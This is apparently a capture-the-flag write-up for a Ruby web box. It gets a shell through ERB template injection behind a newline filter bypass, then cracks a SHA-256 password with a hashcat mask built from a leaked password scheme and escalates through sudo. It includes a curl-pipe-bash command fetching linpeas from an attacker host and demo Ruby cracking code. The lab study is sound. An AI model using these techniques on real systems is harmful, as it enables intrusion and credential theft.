This is an Ubuntu 22.04 machine running a web site vulnerable to Server-Side Template Injection (SSTI), which is exploited to get a shell on the system. For privilege escalation, there is a password hash on the file system that, once cracked, yields the password of a sudoer user.
The application is written in Ruby. According to the references consulted, there are three Ruby template engines to consider: ERB, HAML and Slim, of which ERB is the most common because it ships with Ruby by default. Looking for Ruby ERB SSTI payloads I found these references:
Let's start with the simplest probe, <%= 7*7 %>. Entering it in the "Category" column field returns "Malicious input blocked", so an input filter must be in place.
Testing the application we find that it rejects non-alphanumeric characters, and it turns out the filter can be bypassed by adding a %0A (URL-encoded newline) before the payload. This is consistent with a filter that validates the value against a regex anchored with ^ and $: in Ruby those anchors match line boundaries, not the whole string, so only the first line of the value is checked and whatever follows the newline reaches the template untouched (\A and \z are the whole-string anchors a correct filter would use).
This time the application outputs the value "49", so the SSTI vulnerability is confirmed. Start a listener and refer to HackTricks or PayloadsAllTheThings to prepare an ERB reverse shell payload. Remember to URL-encode it (newline included) before sending.
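The following Ruby snippet is an added example, not code from the box or from this writeup, that reproduces the filter behaviour described above with a constructed allow-list regex: the weak version uses Ruby's line anchors ^ and $ and lets a newline-prefixed payload through to ERB, while the hardened version uses \A and \z. The template and field name are assumptions for the demo.

```ruby
require 'erb'
require 'uri'

# Constructed stand-in for the page's "Category" check, not the box's own
# code: an allow-list regex anchored with ^ and $. In Ruby these are LINE
# anchors, so only the first line of a multi-line value is validated.
WEAK_FILTER   = /^[a-zA-Z0-9 ]+$/
# Hardened variant: \A and \z anchor the whole string, so a newline cannot
# smuggle a second, unchecked line past the allow-list.
STRICT_FILTER = /\A[a-zA-Z0-9 ]+\z/

# Returns true when the filter rejects the value.
def blocked?(value, filter)
  (value =~ filter).nil?
end

# Simulates the vulnerable page: a value that passes the filter is spliced
# into an ERB template and rendered, which is the SSTI sink.
def render_category(value, filter)
  return 'Malicious input blocked' if blocked?(value, filter)
  ERB.new("<td>#{value}</td>").result(binding)
end

# The probe from the text, alone and with a leading newline (what %0A
# becomes once the server URL-decodes the form field).
PROBE  = '<%= 7*7 %>'
BYPASS = "Maths\n<%= 7*7 %>"

# Encodes a payload the way it must be sent in a form body; the newline
# comes out as %0A.
def form_encode(value)
  URI.encode_www_form_component(value)
end

if __FILE__ == $PROGRAM_NAME
  puts render_category(PROBE,  WEAK_FILTER)   # blocked: '<' is not in the class
  puts render_category(BYPASS, WEAK_FILTER)   # first line passes, ERB evaluates 7*7
  puts render_category(BYPASS, STRICT_FILTER) # blocked: whole string is checked
  puts form_encode(BYPASS)                    # what to paste into the request
end
```

The weak filter accepts "Maths\n<%= 7*7 %>" because ^ matches at the start of the string and $ matches just before the newline; the rendered cell then contains 49, exactly the symptom observed on the box. Swapping the anchors for \A and \z is the whole fix.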
For example, this payload was confirmed to be working.
A reverse shell as user susan is received on port 1919, which can be used to retrieve the user flag.
ROOT
Start from the low-privilege reverse shell as user susan. Bearing in mind this is an "easy" box, we assume linpeas.sh will help to discover a flaw automatically.
Serve it from the attacking machine, run it on the target and inspect the results.
> curl http://10.10.xxx.xxx/linpeas.sh |bash
Some interesting facts are revealed. First, cron jobs and Ruby scripts are found in Susan's home directory.
We could try to exploit the fact that susan is a sudoer, but for this we would need her clear-text password. Besides the credentials database that holds her hash, her local mailbox is worth reading for hints about how the password was chosen.
> cat /var/mail/susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

Note that all letters of the first name should be converted into lowercase. Please hit me with updates on the migration when you can. I am currently registering our university with the platform.

-Tina, your delightful student
So we have found the password creation pattern. Since we also have Susan's password hash (a SHA-256 digest, hashcat mode 1400), we are in a position to launch a Hashcat mask attack: the static part susan_nasus_ is known and only the integer has to be brute-forced.
> hashcat -m 1400 hash.txt -a 3 -d 1 susan_nasus_?d?d?d?d?d?d?d?d?d
Note that nine ?d positions generate exactly nine digits, leading zeros included, whereas the pattern writes the integer without padding. The mask therefore only covers secrets that really have nine digits (100,000,000 to 999,999,999); shorter numbers would need increment mode (-i with --increment-min set to the length of the prefix plus one digit), and 1,000,000,000 itself has ten digits. Here the nine-digit mask happens to be enough.
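The Ruby below is an added example, not part of the writeup or of the box, showing the logic behind the mask attack: it builds passwords in Tina's format, hashes them with SHA-256 as mode 1400 does, and searches the integer suffix by increasing digit count, which is what a fixed-width mask does not do. The target hash is constructed from a small made-up integer so the search finishes instantly; the real hash and integer from the box are not reproduced here.

```ruby
require 'digest'

# Builds a password in the format from Tina's mail:
# {firstname}_{firstname backwards}_{integer}, first name lower-cased.
def pattern_password(firstname, n)
  f = firstname.downcase
  "#{f}_#{f.reverse}_#{n}"
end

# Constructed target for the demo (the real hash came from the box); the
# secret integer here is small so the brute force is instantaneous.
DEMO_N    = 4_173
DEMO_HASH = Digest::SHA256.hexdigest(pattern_password('Susan', DEMO_N))

# The hashcat mask from the text, with `width` ?d positions.
def hashcat_mask(firstname, width)
  "#{pattern_password(firstname, '')}#{'?d' * width}"
end

# A fixed-width mask emits numbers of exactly `width` digits, zero-padded.
# Since the pattern writes the integer unpadded, such a mask only covers
# secrets that genuinely have `width` digits.
def fixed_mask_covers?(n, width)
  n.to_s.length == width
end

# Incrementing search (what hashcat -i does): 1-digit numbers, then
# 2-digit, ... up to max_width digits, never with leading zeros.
# Returns the recovered password or nil.
def crack_increment(target, firstname, max_width)
  (1..max_width).each do |width|
    lo = width == 1 ? 1 : 10**(width - 1)
    hi = 10**width - 1
    (lo..hi).each do |n|
      candidate = pattern_password(firstname, n)
      return candidate if Digest::SHA256.hexdigest(candidate) == target
    end
  end
  nil
end

if __FILE__ == $PROGRAM_NAME
  puts hashcat_mask('Susan', 9)                 # susan_nasus_?d?d?d?d?d?d?d?d?d
  puts fixed_mask_covers?(DEMO_N, 9)            # false: 4173 has only four digits
  puts crack_increment(DEMO_HASH, 'Susan', 5)   # susan_nasus_4173
end
```

The full keyspace of the pattern is one billion candidates, which hashcat works through quickly against an unsalted SHA-256 hash; the point of the example is that the integer must be searched unpadded, as the pattern writes it, not that Ruby is the right tool for the job.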
This returns Susan's password, which we can use to connect to the host via SSH.
From the SSH shell, take the opportunity to enumerate the system.
> uname -a && cat /etc/os-release
Linux perfection 5.15.0-97-generic #107-Ubuntu SMP Wed Feb 7 13:26:48 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME="Ubuntu 22.04.4 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.4 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
Now that we have Susan's password we can enumerate her sudo configuration.
> sudo -l
[sudo] password for susan:
Matching Defaults entries for susan on perfection:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User susan may run the following commands on perfection:
    (ALL : ALL) ALL
The rule (ALL : ALL) ALL means susan may run any command as any user, so with her password a root shell is one sudo -i away and the root flag follows.